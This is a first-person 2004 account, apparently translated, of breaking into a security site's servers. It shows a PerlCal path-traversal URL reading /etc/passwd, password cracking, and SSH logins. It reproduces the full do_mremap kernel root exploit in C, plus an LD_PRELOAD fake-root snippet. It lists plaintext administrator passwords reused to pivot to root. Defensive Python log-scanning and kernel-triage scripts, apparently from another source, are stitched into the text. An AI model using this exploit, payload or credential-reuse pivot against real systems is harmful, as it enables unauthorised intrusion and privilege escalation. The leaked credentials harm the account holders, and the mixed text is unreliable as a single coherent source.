Author: sunwear
Mail: shellcoder@163.com
Time: 2004, 5, 7
Preface:
This article is fairly long; I hope you have the patience to read it through. I broke into the server of a well-known security site. The process was quite complicated, a week of struggle, and I hope it helps you. Please be patient when reading :). It also involves some social engineering.
Body
No more chatter. Let's start.
C:\Documents and Settings\Administrator>ping www.xxx.com
Pinging www.xxx.com [192.168.0.252] with 32 bytes of data:
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Ping statistics for 192.168.0.252:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
The IP addresses in this article are not the real ones.
Judging the OS from the TTL in the reply is not really reliable these days.
Scan it first and take a look.
Result: only 21, 22 and 80 are open.
Looks like there is not much chance playing with FTP, and there is no useful information on port 80.
Then I noticed bbs.xxx.com and news.xxx.com, whose IPs are different; it looks like I'll have to penetrate via those.
First go to bbs.xxx.com. The program looks the same as the Green League (NSFocus) forum; there seems to be no vulnerability, so set it aside.
Take a look at that server's ports:
21 22 80 open. Nothing.
Take a look at news.xxx.com.
From the scan, the server should be NT/2000.
21 80 389 1002 3389
Basically no vulnerability: 21 needs a password, 80 is IIS with nothing exploitable, 389 is of no use, and 3389 cannot have the input-method hole.
200 Server
The program on news.xxx.com is ASP, so I thought of SQL injection, but after checking thoroughly, everything is filtered.
A bit depressed.
jswz.xxx.com
Another sub-site, and quite unexpectedly this one uses CGI and the system is Linux.
21 22 80
There is a vulnerability!
cal_make.pl: the name looks a bit familiar, but I couldn't remember it.
After several foreign sites I finally found it ~~~
Name: PerlCal
About: cal_make.pl of the PerlCal script may allow remote users (website visitors) to view any file on a webserver (depending on the user the webserver is running as).
Exploit:
http://www.vulnerable.com/cgi-bin/cal_make.pl?p0=../../../../../../../../../etc/passwd%00
By: stan (stan@whizkunde.org)
Oh, thanks to Hack.co.za.
Enter in the browser address bar:
http://www.xxx.edu/cgi-bin/perlcal/cal_make.pl?p0=../../../../../../../../../../../../../../../../../../etc/passwd
Lots of user information comes out. But this passwd is shadowed, so a good opportunity has to be given up!
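The cal_make.pl request above is the classic pattern a web server log shows for this class of bug: a query parameter carrying "../" sequences and a trailing "%00". As an added example (not part of the original write-up), the Python below parses constructed Apache-style access-log lines and flags such requests, decoding the parameter repeatedly so that a double-encoded null byte ("%2500") is not missed. The log lines, timestamps and IP addresses are made up; the script name comes from the PerlCal advisory quoted above.

```python
"""Flag directory-traversal / null-byte probes against CGI scripts in access logs.

Added example, not code from the write-up.  SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed Apache combined-format lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [07/May/2004:10:01:02 +0800] "GET /cgi-bin/perlcal/cal_make.pl?p0=2004 HTTP/1.0" 200 512
10.0.0.9 - - [07/May/2004:10:01:09 +0800] "GET /cgi-bin/perlcal/cal_make.pl?p0=../../../../../../etc/passwd%00 HTTP/1.0" 200 1830
10.0.0.9 - - [07/May/2004:10:01:15 +0800] "GET /cgi-bin/perlcal/cal_make.pl?p0=..%2F..%2F..%2Fetc%2Fshadow%2500 HTTP/1.0" 403 210
10.0.0.7 - - [07/May/2004:10:02:00 +0800] "GET /index.html HTTP/1.0" 200 4096
"""

# Minimal combined-log parser: client IP, timestamp, method, URL, status, size.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoding (%2500 -> %00 -> NUL)
    cannot hide the payload from the checks below."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def classify(url):
    """Return a list of findings (strings) for one request URL; empty if clean."""
    findings = []
    query = urlsplit(url).query
    for key, raw in parse_qsl(query, keep_blank_values=True):
        val = decode_fully(raw)          # parse_qsl already decoded once
        if '\x00' in val:
            findings.append(f'null-byte in param {key!r}')
        if re.search(r'(^|[\\/])\.\.([\\/]|$)', val):
            findings.append(f'path traversal in param {key!r}')
        if re.search(r'/etc/(passwd|shadow)', val):
            target = val.split('\x00')[0]
            findings.append(f'sensitive file reference in param {key!r}: {target}')
    return findings


def scan_log(text):
    """Return (ip, status, url, findings) for every log line with a finding."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                     # unparseable line: skip, do not crash
        findings = classify(m['url'])
        if findings:
            hits.append((m['ip'], int(m['status']), m['url'], findings))
    return hits


if __name__ == '__main__':
    for ip, status, url, findings in scan_log(SAMPLE_LOG):
        print(f'{ip} {status} {url}')
        for f in findings:
            print('   ', f)
```

A flagged request that got a 200 with a non-trivial response size is the one to look at first, because that is what a successful read of /etc/passwd looks like from the server side. The real fix belongs in the script: reject path separators and NUL in the p0 parameter, or resolve the path and verify it stays inside the calendar data directory before opening it.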
I want to crack these users ~~~
Extract the user names and hope one of them has a weak password.
For the cracking process, please refer to other material.
Out of 20-odd users, 2 cracked, haha.. ~~
Log in over SSH ~
The privileges seem very low.
Try the second one.
Oh, yes.
Now look at escalating privileges ~~
After some tossing around, it's 100% certain: RH73, Linux kernel 2.4.
Use do_brk!
#include <stdio.h>
#include <stdlib.h>

/* The page prints this as a "\x.."-encoded byte string (with several bytes
   lost in transmission); decoded, it is the C source below: fake
   getuid()/geteuid()/getgid()/getegid() that return 0.  Note that this does
   not touch do_brk at all; it only makes the spawned shell *report* uid 0
   through LD_PRELOAD, which is why it achieves nothing real. */
char hellc0de[] =
    "int getuid() { return 0; }\n"
    "int geteuid() { return 0; }\n"
    "int getgid() { return 0; }\n"
    "int getegid() { return 0; }\n";

int main(void)
{
    FILE *fp;

    fp = fopen("/tmp/own.c", "w");
    if (!fp)
        return 1;
    fprintf(fp, "%s", hellc0de);
    fclose(fp);
    /* build the preload library, then start a shell with it loaded */
    system("gcc -shared -o /tmp/own.so /tmp/own.c; rm /tmp/own.c");
    system("LD_PRELOAD=/tmp/own.so /bin/sh");
    return 0;
}
Depressed.
Do something else.
Try the do_mremap VMA local privilege escalation vulnerability.
The mremap(2) system call in the Linux kernel fails to check a function return value; a local attacker can use this vulnerability to obtain root privileges.
The mremap system call is used to change the boundary addresses of virtual memory areas (VMAs). mremap() resizes an existing virtual memory area. Moving part of a VMA to a new area requires a new VMA descriptor, and the page table entries described by the VMA are copied from the old area to the new location in the process page table.
To accomplish this, the do_mremap code needs to call the internal kernel function do_munmap() to clear any existing memory mapping at the new location, i.e. to delete the old virtual memory mapping. Unfortunately the code does not check the return value of do_munmap(); if the maximum number of VMA descriptors has already been exceeded, that call can fail.
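As an added illustration (not part of the write-up), the Python below classifies kernel release strings using the version ranges that the exploit's own check_kver() routine, reproduced further down this page, encodes, and sorts a small host inventory into patch-priority buckets. The inventory and its release strings are constructed; the ranges are taken from that routine, not re-derived here.

```python
"""Kernel release triage for the do_mremap (VMA) issue described above.

Added example, not code from the write-up.  The vulnerable/exploitable
ranges mirror the check_kver() routine of the exploit on this page.
"""
import re


def classify_kernel(release):
    """Return (vulnerable, exploitable) for a 2.x release string.

    Mirrors check_kver(): 2.2.x<=25 and 2.3.x<=99 carry the bug but the
    technique does not apply; 2.4.19-2.4.24, 2.5.x<=75 and 2.6.0-2.6.2 are
    both vulnerable and exploitable; 2.4.x<=18 is marked vulnerable only.
    """
    m = re.match(r'(\d+)\.(\d+)\.(\d+)', release)
    if not m:
        raise ValueError(f'unrecognised kernel release: {release!r}')
    a, b, c = (int(x) for x in m.groups())
    if a != 2:
        return (False, False)        # check_kver() rejects non-2.x strings outright
    if b == 2:
        return (c <= 25, False)
    if b == 3:
        return (c <= 99, False)
    if b == 4:
        if 18 < c <= 24:
            return (True, True)
        if c > 24:
            return (False, False)
        return (True, False)
    if b == 5:
        return (c <= 75, c <= 75)
    if b == 6:
        return (c <= 2, c <= 2)
    return (False, False)


def triage(hosts):
    """Group a {host: release} inventory into patch-priority buckets."""
    buckets = {'exploitable': [], 'vulnerable': [], 'clear': []}
    for host, release in sorted(hosts.items()):
        v, e = classify_kernel(release)
        key = 'exploitable' if e else 'vulnerable' if v else 'clear'
        buckets[key].append(host)
    return buckets


# Constructed inventory (hypothetical host names and release strings).
INVENTORY = {
    'jswz': '2.4.20-8',
    'bbs': '2.4.18-3',
    'mail': '2.4.25',
    'build': '2.6.3',
}

if __name__ == '__main__':
    for bucket, names in triage(INVENTORY).items():
        print(f'{bucket:12s} {", ".join(names) or "-"}')
```

Treat the result as a first cut only: distribution kernels such as Red Hat's 2.4.18-based builds often carry backported fixes, so a bare version string can both over- and under-report exposure; confirm against the vendor's errata before closing a host out.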
:) :) :)
/* Linux kernel do_mremap VMA local privilege escalation exploit (iSEC), as
   reproduced in the write-up.  It relies on the 2004-era i386 toolchain:
   _syscall5() and __NR_* from <linux/unistd.h>, PAGE_SIZE from <asm/page.h>.
   The page's copy had the header names and all '+' characters stripped;
   they are restored here. */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <asm/page.h>
#include <linux/unistd.h>

#define str(s)  #s
#define xstr(s) str(s)

// this is for standard kernels with 3/1 split
#define STARTADDR   0x40000000
#define PGD_SIZE    (PAGE_SIZE * 1024)
#define VICTIM      (STARTADDR + PGD_SIZE)
#define MMAP_BASE   (STARTADDR + 3 * PGD_SIZE)

#define DSIGNAL     SIGCHLD
#define CLONEFL     (DSIGNAL | CLONE_VFORK | CLONE_VM)

#define MREMAP_MAYMOVE  ((1UL) << 0)
#define MREMAP_FIXED    ((1UL) << 1)

#define __NR_sys_mremap __NR_mremap

// how many ld.so pages? this is the .text section length (like from cat
// /proc/self/maps) in pages
#define LINKERPAGES 0x14

// suid victim
static char *suid = "/bin/ping";

// shell to start
static char *launch = "/bin/bash";

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
          ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
                         unsigned long new_len, unsigned long flags,
                         unsigned long new_addr);

static volatile unsigned base, *t, cnt, old_esp, prot, victim = 0;
static int i, pid = 0;
static char *env[2], *argv[2];
static ulong ret;

// code to appear inside the suid image
static void suid_code(void)
{
    __asm__(
        "call callme\n"

        // setresuid(0, 0, 0), setresgid(0, 0, 0)
        "jumpme: xorl %ebx, %ebx\n"
        "        xorl %ecx, %ecx\n"
        "        xorl %edx, %edx\n"
        "        xorl %eax, %eax\n"
        "        mov  $" xstr(__NR_setresuid) ", %al\n"
        "        int  $0x80\n"
        "        mov  $" xstr(__NR_setresgid) ", %al\n"
        "        int  $0x80\n"

        // execve(launch)
        "        popl %ebx\n"
        "        andl $0xfffff000, %ebx\n"
        "        xorl %eax, %eax\n"
        "        pushl %eax\n"
        "        movl %esp, %edx\n"
        "        pushl %ebx\n"
        "        movl %esp, %ecx\n"
        "        mov  $" xstr(__NR_execve) ", %al\n"
        "        int  $0x80\n"

        // exit
        "        xorl %eax, %eax\n"
        "        mov  $" xstr(__NR_exit) ", %al\n"
        "        int  $0x80\n"

        "callme: jmp jumpme\n"
    );
}

static int suid_code_end(int v)
{
    return v + 1;
}

static inline void get_esp(void)
{
    __asm__(
        "movl %%esp, %%eax\n"
        "andl $0xfffff000, %%eax\n"
        "movl %%eax, %0\n"
        : : "m"(old_esp)
    );
}

static inline void cloneme(void)
{
    __asm__(
        "pusha\n"
        "movl $(" xstr(CLONEFL) "), %%ebx\n"
        "movl %%esp, %%ecx\n"
        "movl $" xstr(__NR_clone) ", %%eax\n"
        "int  $0x80\n"
        "movl %%eax, %0\n"
        "popa\n"
        : : "m"(pid)
    );
}

static inline void my_execve(void)
{
    __asm__(
        "movl %1, %%ebx\n"
        "movl %2, %%ecx\n"
        "movl %3, %%edx\n"
        "movl $" xstr(__NR_execve) ", %%eax\n"
        "int  $0x80\n"
        : "=a"(ret)
        : "m"(suid), "m"(argv), "m"(env)
    );
}

static inline void pte_populate(unsigned addr)
{
    unsigned r;
    char *ptr;

    memset((void *)addr, 0x90, PAGE_SIZE);
    r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
    ptr = (void *)(addr + PAGE_SIZE);
    ptr -= r + 1;
    memcpy(ptr, suid_code, r);
    memcpy((void *)addr, launch, strlen(launch) + 1);
}

// hit VMA limit & populate PTEs
static void exhaust(void)
{
    // mmap PTE donor
    t = mmap((void *)VICTIM, PAGE_SIZE * (LINKERPAGES + 3), PROT_READ | PROT_WRITE,
             MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
    if (MAP_FAILED == t)
        goto failed;

    // prepare shell code pages
    // (the loop bound was garbled on the page; restored from the published exploit)
    for (i = 2; i < LINKERPAGES + 1; i++)
        pte_populate(VICTIM + PAGE_SIZE * i);
    i = mprotect((void *)VICTIM, PAGE_SIZE * (LINKERPAGES + 3), PROT_READ);
    if (i)
        goto failed;

    // lock unmap
    base = MMAP_BASE;
    cnt = 0;
    prot = PROT_READ;
    printf("\n"); fflush(stdout);
    for (;;) {
        t = mmap((void *)base, PAGE_SIZE, prot,
                 MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
        if (MAP_FAILED == t) {
            if (ENOMEM == errno)
                break;
            else
                goto failed;
        }
        if (!(cnt % 512) || cnt > 65520)
            printf("\r  mmap #%d 0x%.8x - 0x%.8lx", cnt, base, base + PAGE_SIZE);
        fflush(stdout);
        base += PAGE_SIZE;
        prot ^= PROT_EXEC;
        cnt++;
    }

    // move PTEs & populate page table cache
    ret = sys_mremap(VICTIM + PAGE_SIZE, LINKERPAGES * PAGE_SIZE, PAGE_SIZE,
                     MREMAP_FIXED | MREMAP_MAYMOVE, VICTIM);
    if (-1 == ret)
        goto failed;
    munmap((void *)MMAP_BASE, old_esp - MMAP_BASE);
    t = mmap((void *)(old_esp - PGD_SIZE - PAGE_SIZE), PAGE_SIZE, PROT_READ | PROT_WRITE,
             MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
    if (MAP_FAILED == t)
        goto failed;
    *t = *((unsigned *)old_esp);
    munmap((void *)VICTIM - PAGE_SIZE, old_esp - (VICTIM - PAGE_SIZE));
    printf("\n[+] Success\n\n"); fflush(stdout);
    return;

failed:
    printf("\n[-] Failed\n"); fflush(stdout);
    _exit(0);
}

static inline void check_kver(void)
{
    static struct utsname un;
    int a = 0, b = 0, c = 0, v = 0, e = 0, n;

    uname(&un);
    n = sscanf(un.release, "%d.%d.%d", &a, &b, &c);
    if (n != 3 || a != 2) {
        printf("\n[-] invalid kernel version string\n");
        _exit(0);
    }

    if (b == 2) {
        if (c <= 25)
            v = 1;
    } else if (b == 3) {
        if (c <= 99)
            v = 1;
    } else if (b == 4) {
        if (c > 18 && c <= 24)
            v = 1, e = 1;
        else if (c > 24)
            v = 0, e = 0;
        else
            v = 1, e = 0;
    } else if (b == 5 && c <= 75)
        v = 1, e = 1;
    else if (b == 6 && c <= 2)
        v = 1, e = 1;

    printf("\n[+] kernel %s vulnerable: %s exploitable %s",
           un.release, v ? "YES" : "NO", e ? "YES" : "NO");
    fflush(stdout);

    if (v && e)
        return;
    _exit(0);
}

int main(int ac, char **av)
{
    // prepare
    check_kver();
    memset(env, 0, sizeof(env));
    memset(argv, 0, sizeof(argv));
    if (ac > 1)
        suid = av[1];
    if (ac > 2)
        launch = av[2];
    argv[0] = suid;
    get_esp();

    // mmap & clone & execve
    exhaust();
    cloneme();
    if (!pid) {
        my_execve();
    } else {
        waitpid(pid, 0, 0);
    }
    return 0;
}

Jer ~~~~ Success ..................................................
After finishing a few things, I looked at what else I could use. Oh, mailuserinfo; let's see what's written here ~
admin    E04i9zs8#$%
kelzr    zjjjwoai22@
sunzsdk  2Z2Z2Z2Z2Z2Z2Z2Z
wollf    WoainiliaoyNX
I remember these administrators exist on the main site ~
Looking for the login page: www.xxx.com/login.php
"Your IP is not allowed to log in." Fainted.
Try logging in over SSH to 192.168.0.252.
Sure enough, I can log in: user name kelzr, password WoainiliaoyNx. Oh, it took me 2 minutes of trying.
After logging in I found the privileges are not root. Crying. I tried three privilege-escalation exploits. Depressed-ing.
Depressed, I found a login record: this machine logging in to another machine, with the password recorded in clear text. Destination 192.168.0.2, user name admin, password mozjkelzlf152@, an FTP login. I guess he wrote it down.
I suddenly had an idea :) Disconnect, and reconnect to the host as root with mozjkelzlf152@ ... haha, I'm in.
With that permission, do as you please.
I have penetrated a lot of sites, and such administrators' passwords are generally the same as the password for another unit! Hey ~ Everyone had best develop the habit of not reusing passwords.